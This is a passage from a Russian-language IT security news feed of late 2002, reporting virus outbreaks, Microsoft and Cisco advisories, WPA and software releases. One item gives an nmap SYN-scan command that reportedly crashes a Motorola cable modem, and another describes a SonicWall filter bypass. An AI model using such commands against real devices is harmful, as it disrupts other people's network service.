выслежено, а затем арестовано или убито российскими силовыми стуктурами именно благодаря склонности чеченских командиров к продолжительным сеансам мобильной связи. Источник - http://www.homepc.ru
2/11/2002 17:56 Microsoft: Outlook 11 оградит вас от спама.
Сайт ZDNET распространил информацию от корпорации Microsoft про новую версию почтового клиента Outlook 11, которая войдет в грядущий выпуск Office 11. Впервые за долгое время дефолтные настройки нового Outlook запретят программе автоматически загружать файлы (например, такие как картинки) с внешних серверов при предварительном просмотре полученных сообщений. По мнению разработчиков, данный шаг поможет несколько умерить пыл спамеров, которые используют обращение программы к подобным файлам, как подтверждение существования и активности определенного почтового адреса. Тем не менее, если вам нравится просматривать картинки в сообщениях, вы сможете вновь включить опцию автозагрузки для определенных типов писем или даже создать правило автоматической загрузки изображений с определенных серверов. Также сообщается, что Outlook 11 будет обладать более удобным интерфейсом и содержать большое количество изменений и полезных возможностей. Источник - http://ixbt.com
2/11/2002 17:43 Новый стандарт безопасности для беспроводных WLAN-сетей.
Организация Wi-Fi Alliance, насчитывающая более 150 производителй и разработчиков оборудования, анонсировала новый стандарт безопасности беспроводных локальных сетей 802.11b. Стандарт, названный Wi-Fi Protected Access (WPA), должен прийти на смену Wired Equivalent Privacy (WEP), который, несмотря на то, что поддерживает все сертифицированное Wi-Fi оборудование, имеет весьма серьезные уязвимости. На них не раз обращали внимание независимые группы экспертов и компании, занимающиеся сетевой безопасностью. На современных компьютерах расшифровка перехваченного пароля занимает порядка 10-20 минут, и при этом увеличение длины ключа (обычно используются 64 и 128-битные) не дает существенного результата. Учитывая это, а также то, что информация по взлому WEP широко представлена в интернете, многие компании, эксплуатирующие WLAN-сети, попросту отказываются от его использования, предпочитая полагаться на другие технологии защиты. Новый стандарт будет также совместим с находящимся в разработке стандартом безопасности IEEE 802.11i, чьей составной частью он станет после его принятия. Для использования в небольших или домашних WLAN-сетях в WPA предусмотрен специальный режим с упрощенным использованием паролей. Сохранится возможность одновременной работы в сети клиентов WPA и WEP, а также использующих другие, проприетарные протоколы защиты. Часть старого оборудования можно будет модернизировать под WPA с помощью программных средств. Подробности - http://www.ferra.ru/news/2002/11/1/34657/
2/11/2002 17:38 ПО исправляет системы во время их работы.
Ученые из Университета штата Пенсильвания утверждают, что они разработали программу, которая может восстанавливать базу данных, подвергшуюся атаке, пока та продолжает обработку транзакций. Сотрудники лаборатории кибербезопасности Школы информационной техники (School of Information Sciences and Technology) при университете рассказали, что их ПО способно изолировать команды злоумышленников, направляемые в системы управления базами данных, одновременно восстанавливая любые нанесенные системе повреждения. Это ПО можно настраивать на статическое восстановление или на внесение исправлений в процессе работы: оно прослеживает цепь искаженных команд в то время, пока СУБД продолжает процесс обработки транзакций. «Мы смоделировали поведение злоумышленников, атакующих базу данных, и наблюдали за реакцией системы, — говорится в заявлении профессора университета и руководителя группы д-ра Пэна Лю (Peng Liu). — Мы не можем предотвратить проникновение атакующих, но при использовании нашей технологии база данных может излечивать себя, не прекращая работы». Группа кибербезопасности и ВВС США испытывают прототип программного обеспечения, которое коммерчески пока недоступно. Тем временем ряд крупных производителей СУБД начинает предлагать свои собственные системы самовосстановления. Однако ни одна из них не идет так далеко, как проект Пенсильванского университета; по словам аналитиков, это значительное достижение в данной области. «Существуют разнообразные инструменты, способные обнаруживать аномалии, но они просто генерируют отчет или подают предупредительный сигнал, — говорит аналитик IDC Карл Олофсон (Carl Olofson). — В решении Пенсильванского университета интересно то, что оно автоматически реагирует на атаку». Подробности - http://www.zdnet.ru/?ID=290792
2/11/2002 16:25 Недельный отчет о вирусах Panda Software.
За последние дни было обнаружено три новых вируса. Первый – H-вариант червя Opaserv. W32/Opaserv.H во многом схож со своими собратьями. Его основная цель – заразить как можно большее число компьютеров, подключенных к сети. Вредоносный код также пытается обратиться по одному из веб-адресов, чтобы обновить свои компоненты. Однако, в отличие от других разновидностей червя Opaserv, размер файла- носителя червя Opaserv.H может быть самым различным. Инфицированный файл сжат утилитой PCShrink, которая позволяет не только уменьшить размер вируса, но и зашифровать его вредоносный код. Чтобы установить себя на компьютеры жертв, Opaserv.H ищет уязвимые машины через Internet, обращается с запросом к порту 139, а затем копирует себя в каталог C:\\\\Windows под именем MARCO!.SCR. Другой червь, открытый недавно в вирусной лаборатории компании Panda Software, – Oror.B (W32/Oror.B). Он относится к категории опасных вирусов, т.к. может удалять всю информацию с жестких дисков зараженного ПК. Червь также способен распространяться по электронной почте, в IRC-чатах и популярной сети обмена файлами Kazaa. Третий вредоносный код – Mylka.A (W32/Mylka.A) способен удалять системные файлы Windows и файлы некоторых приложений, например антивирусных программ. Mylka.A использует методы социального инжиниринга для распространения по электронной почте. Зараженное письмо и имя вложенного файла могут иметь различные характеристики. Источник - http://www.viruslab.ru/
2/11/2002 15:29 Panda ActiveScan 4.0 ловит троянов бесплатно.
Panda ActiveScan 4.0, новая версия бесплатной онлайновой антивирусной программы компании Panda Software, способна обнаруживать и устранять троянов на любом компьютере. Panda ActiveScan 4.0 нейтрализует более 64 000 известных вирусов, проверяет жесткие диски, дисководы, системную память, загрузочные секторы, электронную почту, отдельные папки или файлы. Подозрительные на вирус файлы можно отправить в Службу спасения от вирусов. Там они подвергаются тщательному анализу. В обновленной программе предусмотрена также система "отключения", позволяющая значительно сократить время нахождения в Сети, пользователям нужно подключиться к интернету только в начале и в конце проверки. Сайт производителя - http://www.viruslab.ru/
2/11/2002 13:5 Двадцатка вирусов за октябрь: Klez уходит на третье место
В октябре на первое место с 44,9% заражений вырвался червь Tanatos, также известный как BugBear. Tanatos распространяется по почте, причем письма, содержащие вирус могут иметь различные заголовки, тексты, имена вложений и форматы. В связи с этим довольно сложно идентифицировать вирус по внешним признакам, таким как тема сообщения или имя вложенного файла. Для автоматического запуска вируса в почтовом клиенте MS Outlook используется давно и печально известная брешь IFRAME, заплатку для которой, по-видимому, установили далеко не все. В вирус встроена функция управления компьютером через интернет и возможность принудительного завершения работы различных антивирусов. "Лаборатория Касперского" обновила бесплатную утилиту для борьбы с вирусами Klez и Sircam, добавив функции поиска и удаления вирусов Tanatos и Opasoft. Источник - http://www.compulenta.ru/2002/11/1/35160/
1/11/2002 19:19 Журналисты взломали почтовый ящик Саддама Хусейна.
Журналисты американского журнала Wired проникли в электронный почтовый ящик Хусейна, адрес которого - press@uruklink.net - опубликован на официальном сайте иракской администрации. Как утверждают сотрудники Wired, проникнуть в почтовый ящик иракского лидера оказалось проще простого. Достаточно было использовать "дыру" в системе программного обеспечения иракской государственной компании, обеспечивающей жителей этой страны доступом в интернет, передает BBC. Выяснилось, что каждую неделю иракский лидер получает несколько десятков писем. Чаще всего среди них встречаются послания с угрозами и заявления о готовности вступить в иракскую армию и пойти в бой против американцев. Так, некий американец отправил Хусейну фотографию атомной бомбы. Текст письма содержали лишь два слова - "очень скоро". Прямо противоположной точки зрения придерживается автор другого послания, отправленного из Австрии: "Купите мне билет в Ирак - и я буду воевать с американцами до последней капли крови. Поверьте, я не шучу. Кстати, я очень хорошо стреляю". Время от времени Хусейну пишут и люди, которых интересует не столько сама политика, сколько возможность сделать на ней деньги. Источник - http://www.newsru.com
1/11/2002 18:4 Mac OS - самая безопасная операционная система
Как установила английская компания mi2g, на сегодняшний день самой безопасной операционной системой для настольных компьютеров является Mac OS, опережая по этому показателю Windows и даже, как ни странно, Linux. Такие результаты были получены на основе анализа данных базы Security Intelligence Products and Systems (SIPS), которая ведется с 1995 года. В нее занесена информация о более чем 100 тысячах случаев взломов и атак и о деятельности 6 тысяч хакерских группировках. Согласно mi2g, за первые 10 месяцев 2002-го года пользователями и разработчиками были выявлены 1162 уязвимости в различных операционных системах и программном обеспечении. Из них на долю Mac OS приходятся лишь 31 (0,05%). Лидерство здесь занимает Microsoft Windows - более 500 различных дыр (44%). Затем следуют Linux (19%), BSD (9%) и Sun Solaris (7%). По числу атак также впереди Windows - 31 тыс. случаев (54%). Linux занимает второе место с 17 тыс. (30%). Источник - http://compulenta.ru/2002/11/1/35125/
1/11/2002 18:05 Opera 6.1 для LINUX.
Норвежская фирма Opera Software ASA объявила о выпуске версии своего броузера Opera 6.1 для ОС LINUX. Теперь помимо Intel платформы поддерживается также платформа PowerPC. Из изменений хотелось бы отметить следующие: поддержка анти-алиас шрифтов по умолчанию, улучшена поддержка азиатских шрифтов - японского, корейского, китайского, включена поддержка Xft 1 и Xft 2, включена поддержка библиотеки Qt 3-й версии, что, по идее, должно облегчить операции "копировать-вставить". Подробности и ссылка на даунлоад - http://www.opera.com/pressreleases/en/2002/10/31/
1/11/2002 17:41 NGSSQuirreL - сканер уязвимостей SQL-сервера.
NGSSoftware выпустила сканер уязвимостей Microsoft SQL-сервера. Уязвимости проверяются на основе собственной базы данных уязвимостей, включённой в состав сканера. По мере нахождения новых "дыр" существует возможность обновления этой базы с сервера NGSSoftware Insight Security Research team. Помимо нахождения уязвимости сканер позволяет одним нажатием кнопки мыши запустить соответствующий скрипт, закрывающий брешь в защите. Сканер может представлять интерес для разработчиков, администраторов и специалистов по безопасности. Работает на серверах под управлением ОС Win 2K/XP/.NET Подробности - http://www.nextgenss.com/software/ngssquirrel.html
1/11/2002 17:25 Разрешения на файлы в Windows 2000 позволяют устанавливать трояны.
Фирма Microsoft выпустила бюллетень по безопасности MS02-064, в котором утверждается, что установленные по умолчанию разрешения (permissions) позволяют устанавливать в ОС троянские программы. Windows 2000, заданные по умолчанию разрешения позволяют группе Everyone полный доступ к системной корневой папке (обычно C:\). В большинстве случаев, системный корень не находится в пути поиска файлов. Однако, в некоторых случаях это не так - например, в процессе входа в систему или когда приложения вызваны непосредственно из рабочего стола Windows через Start | Run. Эта ситуация может привести к сценарию, который позволяет атакующему создать троян против других пользователей той же самой системы, создавая программу в системном корне с тем же самым именем, которое имеет программа, используемая другим пользователем. Такая программа выполнилась бы с собственными привилегиями пользователя, тем самым, позволяя атакующему выполнять любые действия, которые способен совершить текущий пользователь. В самом простом сценарии нападения, атакующий может изменить специфическую системную программу, которая запускается сценарием входа в систему. Другие сценарии почти наверняка требуют большего пользовательского взаимодействия - например, убедить пользователя запустить специфическую программу через Start | Run - и требуют использования социотехники. Необходимо отметить, что данная уязвимость была обнаружена господином ЗАРАЗА c security.nnov.ru 17 мая 2002 г., однако тогда Microsoft ответила, что это больше проблема правильного администрирования системы. В нынешнем бюллетене ещё раз констатируется факт правильного администрирования, однако есть и ссылка на патч. В новости использован перевод с Securitylab.ru с собственными добавлениями. Подробности - http://www.microsoft.com/technet/security/bulletin/MS02-064.asp
1/11/2002 17:02 DoS в IIS версий 5/5.1.
Как сообщает в BUGTRAQ Марк Личфилд из NGSSoftware, обнаружена уязвимость в IIS (Internet Information Server and Intranet Server от Microsoft) версий 5/5.1, которая делает возможность проведения атаки типа DoS (отказ в обслуживании). Уязвимость связана с некорректным выделением памяти при обработке WebDAV-запросов (Web-based Distributed Authoring and Versioning). WebDAV фактически является расширением HTTP-протокола, позволяющем командам разработчиков Вэб-приложений и другим рабочим группам использовать удалённый Вэб-сервер таким образом, как будто он является локальным файл-сервером. При посылке определённым образом сформированного запроса к сервису WebDAV, IIS отводит очень большое количество памяти на сервере для обработки запроса. При посылке большого количества запросов можно вывести IIS из строя (типичный DoS). Для выполнения атаки необходимы 2 условия: сервер должен поддерживать WebDAV-запросы и должен быть запущен сервис индексирования (Indexing server service). Необходимо отметить, что по умолчанию WebDAV-запросы поддерживаются, однако служба индексирования отключена. Microsoft выпущен патч (бюллетень MS02-062). Источник - http://www.ngssoftware.com Патч от Microsoft - http://www.microsoft.com/technet/treeview/...
1/11/2002 14:15 Уязвимость в продуктах CISCO.
Выпущен бюллетень по безопасности CISCO, в котором утвержается об уязвимости некоторых "железок", выпускаемых этой известной фирмой. В данном случае уязвимость была обнаружена в Cisco ONS15454 optical transport platform и Cisco ONS15327 edge optical transport platform. Уязвимость присутствует в ПО ONS до версии 3.4. Управление устройствами осуществляется посредством управляющих карт TCC, TCC+, TCCi, XTC, обычно изолированных от внешней (Internet) сети, поэтому возможность проведения атак ограничена внутренней сетью. Из обнаруженных уязвимостей можно отметить следующие: возможность открытия FTP-сессии с использованием пары юзер/логин несуществующего пользователя, имена пользователей и пароли хранятся в незашифрованном виде в БД управляющих карт, использование HTTP - запроса, начинающегося с любого символа, кроме "/" приводит к перезагрузке управляющих карт и т.д. Всего обнаружено 6 уязвимостей. Последствия уязвимостей различны: от возможности неавторизованного доступа до возможности вызова перезагрузки. Выпущены обновлённые версии ПО. Подробности - http://www.cisco.com/warp/public/707/ons-multiple-vuln-pub.shtml
1/11/2002 13:40 Возможность DoS в кабельном модеме Motorola.
Райан Свит (Ryan Sweat) обнаружил простой способ вывода из строя кабельного модема фирмы Motorola. Тестирование проводилось на модели Surfboard 4200 с версией ПО SB4200-0.4.4.0-SCM06-NOSH. Модем этого типа используется в качестве моста между внутренней (Intranet) cетью и внешней (Internet). Соотвественно, внутренний IP-адрес модема назначается из пространства адресов, выделяемых в соответствии с RFC1918 (например: 192.168.x.x). Для выведения модема из строя (как снаружи, так и изнутри) достаточно задать сканирование NMAP вида: # nmap -sS -p 1-1024 IP_address_of_modem. Самое примечательное, что для восстановления нормального функционирования модема необходимо физическое отключение модема с последующей "железной" перезагрузкой. Как указывает автор, для имитации атаки совершенно необязательно использовать cканер NMAP, можно выполнить SYN-сканирование (а именно это задаётся в ключах nmap) другими общедоступными сканерами. Источник - http://www.securiyufocus.com
1/11/2002 10:35 Новый веб-портал, претендующий на лавры сразу и Yahoo и Google.
В интернете появился новый портал My Way (httP://www.myway.com), ставящий своей целью потеснить c пьедестала знаменитый Yahoo. Создатели портала решили взять на вооружение стратегию компании Google, которая с минимальными затратами сумела превратить свою поисковую систему в безусловного лидера рынка. Ни на одной из страниц сайта My Way не будет графических рекламных баннеров, а тем более, рекламы в виде flash-роликов, видеоклипов и выскакивающих окон. И хотя создатели нового портала признают, что многие пользователи мирятся с таким положением дел, они считают, что большинство предпочли бы читать новости, отправлять письма или искать информацию, не отвлекаясь на надоедливую рекламу, постоянно мелькающую перед глазами. Отказ от баннеров позволяет также значительно ускорить загрузку страниц и освободить на них место для полезной информации. По своей функциональности My Way больше всего напоминает портал Yahoo, что, в общем, неудивительно. На сайтах используются похожие средства настройки персональных страниц, хотя набор сервисов у My Way пока несколько беднее. Тем не менее, на сайте есть все необходимое для большинства пользователей: новости, погода, биржевые сводки, гороскоп, телепрограмма, поиск и каталог сайтов. Источник - http://www.compulenta.ru
1/11/2002 10:27 Шестая версия Palm OS будет основана на BeOS.
Компания PalmSource, дочернее предприятие Palm по разработке программного обеспечения, раскрыла информацию о следующей, шестой версии операционной системы Palm OS, сообщает сайт The Register. По словам разработчиков, Palm OS шестой версии будет значительно переработана. Основным нововведением станет появление средств работы с графикой и мультимедийным контентом, заимствованных из операционной системы BeOS. Активы компании Be Inc., разработчика BeOS, были приобретены компанией Palm в прошлом году. Отличием Palm OS 6 от предшественников станет модульная система подключения интерфейсов ввода-вывода. Это значит, что компании, лицензирующие Palm OS, смогут, к примеру, заменить интерфейс рукописного ввода Graffiti на альтернативу своей собственной разработки. Среди других запланированных изменений и нововведений следует отметить расширяемую архитектуру ежедневника (PIM) и создание API для упрощения сетевых подключений по различным стандартам и протоколам. В новой версии ОС смогут работать приложения для PalmOS 4 и 5 - для этого будет написан специальный эмулятор. Источник - http://www.theregister.co.uk
1/11/2002 10:21 Список троянов, действующих в ОС Windows.
Сайт HNS (Help Net Security) опубликовал на прошлой неделе список троянских программ, действующих под ОС Windows. В указанном файле содержится также информация о том, как функционируют эти вредоносные программы, описание их вариантов и способы минимизации риска заражения. "Windows-трояны - всего лишь небольшой аспект Windows-безопасности, однако, они могут быть очень опасными и содержать деструктивные функции," - говорится в статье. Подробности - http://www.net-security.org/dl/articles/comp_trojans.txt
1/11/2002 10:10 Осторожно! Червь-открытка!
Корпорация Microsoft в сообщении от 29 октября предупреждает пользователей о подозрении на вредносную программу, распространяющуюся под видом поздравительной открытки. Пользователям, пытающимся просмотреть электронную открытку, предлагается установить новую программу. Далее мелким шрифтом лицензионного соглашения конечного пользователя сообщается, что программа будет иметь доступ к адресной книге пользователя. Во вторник специалисты MessageLabs обнаружили, что коварная открытка теперь рассылается с нового веб-сайта - Cool-Downloads.com, - зарегистрированного в Панаме. Источник - http://www.viruslist.com
31/10/2002 19:30 Автор вируса Anna Kournikova проиграл очередное судебное разбирательство.
Апелляционный суд Дании подтвердил решение суда низшей инстанции о виновности Яна де Вита, создателя печально известного вируса Anna Kournikova. Таким образом, приговор 22-летнему хакеру, известному под кличкой OnTheFly остается в силе: де Вит должен отработать 150 часов на общественных работах. Ян де Вит подал апелляцию на решение суда, так как опасается, что обвинительный приговор может разрушить его карьеру. В настоящее время Ян работает в компьютерном магазине. Адвокат де Вита заявил, что расстроен решением суда. По его мнению, де Вит не хотел причинить кому-то вред, когда писал вирус Anna Kournikova. Тем не менее, весомым доказательством вины датского хакера стала справка ФБР США, предъявленная прокуратурой, в которой говорится о том, что вред на самом деле был причинен. В то же время, в этой бумаге не оговаривались точные размеры ущерба, нанесенного компьютерным сетям компаний и государственных организаций. Подробности - http://www.homepc.ru/news/2002/10/29/35040/
31/10/2002 19:21 NetMap - на пульсе сети.
Вашему вниманию предлагается программа NetMap, которая позволяет решить задачу мониторинга узлов в сети по протоколу ICMP. Для этого программа периодически направляет запросы узлам из указанного списка. Список может содержать большое количество узлов (более ста), при этом в главном окне программы можно наблюдать реакцию любых восьми узлов по вашему выбору. NetMap отображает состояние узлов и ведет протокол полученных откликов. Если какой-либо узел не отвечает на повторные запросы, предусмотрена возможность запуска внешней программы. Узлы, которым направляются запросы, выбираются из списка в циклической последовательности. Интервал отправки запросов - шесть секунд. Настройки по умолчанию обязывают программу ожидать отклика в течение пяти секунд. Полученный отклик добавляется к ежедневной статистике, которую можно просматривать, выводить на печать и сохранять в файл на диске. При необходимости, NetMap можно настроить на загрузку при старте операционной системы и работу в автоматическом режиме. Предусмотрена минимизация программы в системную область панели задач. При этом ее пиктограмма отображает состояние самого "ненадежного" узла. Программа распространяется бесплатно. Она рассчитана на эксплуатацию под управлением Windows 9x/NT. Сайт разработчика - http://www.imach.uran.ru/netmap/indexr.html
31/10/2002 19:10 AbsoluteControl v.2.0.
AbsoluteControl - является крошечной бесплатной утилитой, при помощи которой вы сможете управлять операционной системой одним кликом мыши: выставить разрешение с максимальным рефрешем, открыть/закрыть CD-ROM, перезагрузить или полностью выключить компьютер, начать поиск документов в Интернете и т.д. Предназначена для ОС: Win 9x/ME/NT/2000/XP. Объём - 109 КБ. Скачать - http://kamatoz.com/AbsoluteControl-ENG-Setup.zip
31/10/2002 19:05 Microsoft: кумулятивный патч для Outlook Express и новые уязвимости ОС Windows.
Корпорация Microsoft обнаружила и уже ликвидировала новые дырки в системе безопасности операционных систем Windows. Вашему вниманию представляются три обновления: * Кумулятивное обновление для английской версии Outlook Express 6.0 SP1 - Обновление исправляет как новые, так и ранее обнаруженные проблемы. Оно предназначено для установки в операционных системах Windows9x/ME/NT/2000/XP. Патч весит 2,0 Мб. * Security Update для Internet Explorer - Данный выпуск Security Update закрывает брешь в защите Internet Explorer в операционных системах Windows 2000/XP, позволявшую сайтам получать информацию о содержимом вашего диска. * Q329834: Security Update (Windows XP) - Повышает безопасность операционных систем Windows XP и Windows XP SP1. Патч можно загрузить с Microsoft Windows Update. Патч для Аутлук - http://download.microsoft.com/download/outlookexp/... Обновление для IE и Security Update для ХР - http://v4.windowsupdate.microsoft.com/en/default.asp
31/10/2002 18:53 Кто на самом деле "замочил" Kavkaz.org.
Как известно, на следующий день после захвата заложников в московском ДК рупор чеченских боевиков — сайт Kavkaz.org - перестал функционировать (не работает он до сих пор). В связи с этим высказывались различные предположения: говорили и о действиях спецслужб, и об атаках конкретных российских хакерских команд. В распоряжение CNews.ru попала эксклюзивная информация, которая проливает свет на историю исчезновения сайта. Анонимный источник CNews.ru, сотрудник одной из американских хай-тэк-компаний, располагающейся в Силиконовой Долине, утверждает, что сайт был выведен из строя вовсе не спецслужбами или хакерами-нелегалами, а при помощи группы русских и американских программистов, живущих в Калифорнии. После захвата заложников в Москве среди них разгорелась дискуссия по поводу истоков и причин чеченского терроризма, которая перекинулась на рупор сепаратистов — скандально знаменитый сайт. Они выяснили, что сайт поддерживается одной калифорнийской компанией. Было принято решение: не дать сайту дезориентировать общественность и пропагандировать терроризм во время драматических событий в Москве. Остальное было делом техники. «Респектабельная американская компания, поддерживавшая нейм-сервера террористов, была в полном неведении, они были в шоке, когда узнали, что оказались невольными пособниками террора. Сайт „загасили“ в течение 10 минут. Трудно поверить, что все так просто и хакеры не понадобились, но это так», — рассказывает участник событий. Источник CNews.ru утверждает, что владельцы сайта Kavkaz.org уже заключили новый договор на обслуживание ресурса с крупным американским регистратором доменов и хостинг-провайдером. Кстати, тем, кто никогда не посещал Kavkaz.org, напомним, что он отнюдь не является «домашней страничкой» какого-нибудь фанатика, а финансируется достаточно щедро: выполнен на трех языках — английском, арабском и русском с использованием flash-технологий. Источник - http://www.cnews.ru
31/10/2002 18:33 Linux 2.5.45.
Очередное ядро нестабильной ветви. На этот раз: новый crypto API, добавлен системый вызов sys_epoll(), система конфигурации ядра заменена на LinuxKernelConf и многое другое. Подробности - http://lwn.net/Articles/14197/
31/10/2002 18:31 Linux постучалась в Microsoft Office
Бесплатная операционная система (ОС) Linux настойчиво теснит Microsoft Windows на ее главном поле -- ОС для настольных компьютеров. Немецкая Linux-компания SuSE, одна из крупнейших в отрасли, объявила вчера, что готова к продажам новой Linux, способной выполнять программы Microsoft Office. Подробности - http://www.ione.ru/scripts/events.asp?id=11483
31/10/2002 17:37 Переполнение буфера в PPTP в Windows 2000/XP.
Windows 2000 и Windows XP поддерживают Point-to-Point Tunneling Protocol (PPTP), технологию виртуальной частной сети, которая осуществлена как часть Remote Access Services (RAS). PPTP , как дополнительный компонент, поддерживается в Windows NT 4.0, Windows 98, Windows 98SE, и Windows ME. Переполнение буфера обнаружено в коде, который обрабатывает данные управления, используемые для установления, поддержки и разрыва PPTP подключений. Поставляя специально обработанные PPTP control данные к уязвимому серверу, нападающий может разрушить память ядра, что приведет к нарушению работы всей системы. Уязвимость может использоваться против любого PPTP сервера. Если рабочая станция работает как RAS сервер, предлагающий PPTP службу, система также будет уязвима. . Рабочие станции, действующие как PPTP клиенты, могут быть атакованы в течение активных PPTP сеансов. Нормальная операция на любой атакованной системе могла быть восстановлена после перезапуска системы. Источник - http://www.SecurityLab.ru/?ID=33967
31/10/2002 17:15 Новая версия 4.29 программ Dr. Web.
Вчера объявлено о выпуске новой версии (4.29) популярного антивирусного пакета Dr. Web. Оптимизировано использование памяти для проверки архивов в режиме по формату. Исправлены ошибки разбора некоторых разновидностей архивов RAR. Расширен набор опознаваемых по формату файлов. В сканере Dr.Web для Windows усовершенствован режим проверки стартовых файлов для платформы Windows 2000/XP; Усовершенствован алгоритм работы со сменными носителями CD-R/RW; исправлена работа с настройкой приоритета проверки. В версии для Novell Netware исправлена ошибка, возникавшая при использовании консоли сервера в режиме secure console. В агенте автоматического обновления Dr.Web для Windows изменен алгоритм авторизации на прокси-сервере. При автоматическом обновлении вирусных баз введен контроль версии Dr.Web. В резидентном стороже SpIDerGuard для Windows 95/98/Me исправлены ошибки при работе с дискетами нестандартного формата; добавлена возможность задания интервала между автоматическими обновлениями версий в секундах и часах; в SpIDerGuard для Windows NT/2000/XP исправлена ошибка, приводившая к сбою системы при завершении работы компьютера. В демоне (Dr.Web Daemon) для Unix реализован разбор почтовых форматов CommuniGate Pro и Zmailer; устранены утечки памяти в фильтрах Dr.Web Daemon для Communigate Pro, Courier и Zmailer для платформ FreeBSD и Solaris. Источник - http://www.drweb.ru
30/10/2002 18:32 Несколько тысяч украинских доменов может быть удалено.
4 ноября компания "Хостмастер", администратор украинской доменной зоны .UA, начнет удаление доменов третьего уровня, оканчивающихся на .com.ua, не прошедших перерегистрацию. Как сообщают в компании "Хостмастер", по состоянию на 29 октября число неперерегистрированных доменов составило более 14 тысяч, а общее количество зарегистрированных в домене .com.ua имен составляет 25500. По мнению генерального директора службы регистрации доменных имен компании "Альфа-Каунтер", такое большое количество неперерегистрированных доменов связано с тем, что украинские СМИ не проявляли особую активность в освещении этого вопроса. О перерегистрации доменных имен в домене .com.ua было заявлено сразу же после введения новых правил регистрации. Администраторам всех доменов, зарегистрированных до 4 ноября 2001 года, было отправлено уведомление о необходимости перерегистрации. Подробности - http://www.a-registrator.com.ua/infocentre/n4.html
30/10/2002 14:50 Web-семинар "Apache 2.0:Что нового?".
Фирма Covalent, создатель продукта Enterprise Ready Server, 12 ноября проводит Web-семинар "Apache 2.0: Что нового?" (APACHE 2.0: WHAT'S NEW?) в 19:00 по Гринвичу. Семинар является свободным (читай-бесплатным) и посвящён основным нововведениям, появившимся в версии 2.X популярного Web-сервера Apache. На семинаре будут рассмотрены вопросы: Multi-Processing Modules, Hooks Registered at run-time, How Modules are handled by Apache 2.0, Filters, Protocol Modules, Apache Portable Run-time. В дополнение к этому будет представлен первый коммерческий проддукт, основанный на Apache 2.0, выпускаемый Covalent Enterprise Ready Server. Как следует из названия семинара, он будет проводиться через Интернет. Для участия необходима регистрация. Подробности - http://promo.covalent.net/cgi-bin/gx.cgi/mcp?q=STSDhTF3vIKyw
30/10/2002 14:33 Microsoft Office 11 будет совместим только с Windows 2000 и XP.
Новый офисный пакет корпорации Microsoft, известный под кодовым названием Office 11, не будет работать в операционных системах семейства Windows 9x. Использовать его можно будет только на компьютерах, работающих под управлением Windows XP или Windows 2000 с установленным Service Pack 3. Необходимость в Service Pack 3 объясняется тем, что Office 11 использует новый мастер установки Windows Installer 2, реализованный на платформе Windows 2000 только в третьем пакете исправлений для этой ОС. Первым о несовместимости Office 11 с устаревшими версиями Windows сообщил сайт BetaNews со ссылкой на информацию одного из разработчиков пакета, появившуюся в конференции, посвященной бета-тестированию Office 11. В сообщении говорится, что хотя в Microsoft осознают, что такое решение может не понравиться некоторым пользователям, оно позволяет значительно повысить безопасность и стабильность конечного продукта. Исчтоник - http://www.compulenta.ru
30/10/2002 14:30 Windows 2000 признана одной из самых безопасных операционных систем.
Корпорация Microsoft объявила о том, что ее операционная система Windows 2000 получила сертификат безопасности Common Criteria. Это свидетельствует о том, что данная ОС является одной из наиболее безопасных и может использоваться для решения многих критически важных задач. Сертификация Common Criteria является общепризнанным стандартом в области оценки безопасности и надежности программного обеспечения и других ИТ-продуктов. Требования, предъявляемые к сертифицируемым продуктам, и методы проведения сертификации описываются в международном стандарте ISO-IEC 15408. Проверка Windows 2000 на соответствие требованиям этого стандарта проводилась путем экспертной оценки ее архитектуры, документации, степени соответствия международным стандартам в области безопасности и т.д. Кроме этого, проводились испытания ОС в решении ряда практических задач. По словам представителей Microsoft, обеспечение высокой степени безопасности Windows 2000 потребовало нескольких лет работы и многомиллионных финансовых затрат. Все они, однако, окупаются за счет повышения безопасности и стабильности работы операционной системы. Получение сертификата Common Criteria особенно важно в свете реализуемой в Microsoft программы за безопасный компьютинг. В ближайшее время Microsoft намерена начать процесс сертификации на соответствие требованиям ISO-IEC 15408 операционных систем Windows XP и Windows .Net Server. Подробности - http://www.microsoft.com/presspass/press/2002/Oct02/10-29CommonCriteriaPR.asp
30/10/2002 14:12 Возможность обхода фильтра SonicWall.
Marc Ruef из computec.ch обнаружил возможность обхода фильтра Вэб-сайтов в ПО SonicWall. Как утверждает автор, обойти защиту можно, если ввести вместо FQDN-имени сайта (например, www.google.com) его IP-адрес (216.239.53.101). Ранее подобная уязвимость была обнаружена Марком в NetGear FM114P. Источник - http://www.computec.ch
30/10/2002 13:55 Обновление версии RU.LINUX FAQ.
Произошло очередное обновление часто задаваемых вопросов эхо-конференции ФИДО ru.linux. Ведущий FAQ Александр Канавин, последний выпуск датирован 25-м октября 2002 г. Cсылка - http://www.sensi.org/~ak/linuxfaq/
30/10/2002 13:40 Cтатья "The IP Smart Spoofing".
Laurent Licour и Vincent Royer из французской группы по исследованию безопасности Althes S.A. опубликовали статью, посвящённую технологии, получившей название IP Smart Spoofing. По словам авторов, применяимая ими технология позволяет обойти различные системы защиты, основанные на применении в правилах защиты IP-адресов. Сама технология не нова-для организации комплекса методов для обхода защиты авторы применяли комбинацию следующих техник: 1. The ARP Cache Poisoning. 2. Network address translation (NAT). 3. Маршрутизация (routing). При применении описанных авторами техники возникала ситуация, называемая в терминах сетевой безопасности Man-In-The-Middle (MITM), то есть машина злоумышленника как бы вклинивается в легально организованный канал клиент-сервер. Присутствие злоумышленника никак не определяется стандартными средствами защиты (в том числе бессильными оказываются и коммутаторы (switches)). Для организации атаки применялись инструменты arp-sk (или arpsoof) и iptables. Описанная технология будет продемонстрирована на выставке InterOp в Париже, намеченной на 6-8 ноября этого года. Подробности - http://www.althes.fr/ressources/avis/smartspoofing.htm
30/10/2002 13:15 Хакеры-исламисты переносят джихад в Интернет.
